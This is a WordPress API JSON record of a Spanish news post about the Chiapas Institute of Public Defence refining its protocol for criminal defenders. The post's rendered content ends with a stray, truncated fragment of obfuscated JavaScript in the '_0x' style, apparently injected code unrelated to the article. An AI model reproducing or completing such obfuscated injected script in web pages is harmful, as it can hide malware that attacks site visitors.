{"id":2463,"date":"2022-05-30T03:20:04","date_gmt":"2022-05-30T03:20:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2463"},"modified":"2022-05-30T03:20:05","modified_gmt":"2022-05-30T03:20:05","slug":"continua-mejorando-instituto-de-defensoria-publica-protocolo-de-actuacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2463","title":{"rendered":"Contin\u00faa mejorando Instituto de Defensor\u00eda P\u00fablica, protocolo de actuaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0053-1024x768.jpg\" alt=\"\" class=\"wp-image-2464\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0053-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0053-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0053-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0053.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>29 de Mayo del 2022 . En continuidad a las pol\u00edticas de actualizaci\u00f3n permanente, implementadas por el magistrado presidente del Poder Judicial del Estado, Juan \u00d3scar Trinidad Palacios, el Instituto de la Defensor\u00eda P\u00fablica celebr\u00f3 su Tercera Mesa de Trabajo con las y los subdirectores regionales, coordinadores y subdirectores de Unidades T\u00e9cnicas.En el desarrollo de este ejercicio, encabezado por el director general del Instituto de la Defensor\u00eda P\u00fablica, Jorge Alberto Selvas Culebro, se instruy\u00f3 la creaci\u00f3n de nuevas rutas de atenci\u00f3n del protocolo de actuaci\u00f3n dirigido a las y los defensores p\u00fablicos en materia penal, con la finalidad de homologar las actuaciones que estos profesionales realizan a favor de las personas imputadas, procesadas o sentenciadas.La creaci\u00f3n y fortalecimiento de este protocolo ante la ciudadan\u00eda chiapaneca, obedece a las mejoras que se implementan de manera permanente en dicho Instituto, complement\u00e1ndose con la contin\u00faa actualizaci\u00f3n de las y los defensores p\u00fablicos a trav\u00e9s de cursos y capacitaciones en distintas materias.Este documento, es tambi\u00e9n resultado de las instrucciones del magistrado presidente,  Trinidad Palacios, y de los trabajos generados desde el Consejo de la Judicatura, con la finalidad de brindar en todo momento, la correcta defensa de los derechos humanos y acceso a la justicia, para la poblaci\u00f3n m\u00e1s necesitada en nuestro estado.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>29 de Mayo del 2022 . En continuidad a las pol\u00edticas de actualizaci\u00f3n permanente, implementadas por el magistrado presidente del Poder Judicial del Estado, Juan \u00d3scar Trinidad Palacios, el Instituto de la Defensor\u00eda P\u00fablica celebr\u00f3 su Tercera Mesa de Trabajo con las y los subdirectores regionales, coordinadores y subdirectores de Unidades T\u00e9cnicas.En el desarrollo de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2464,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2463","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2463","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2463"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2463\/revisions"}],"predecessor-version":[{"id":2465,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2463\/revisions\/2465"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2464"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2463"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2463"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2463"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}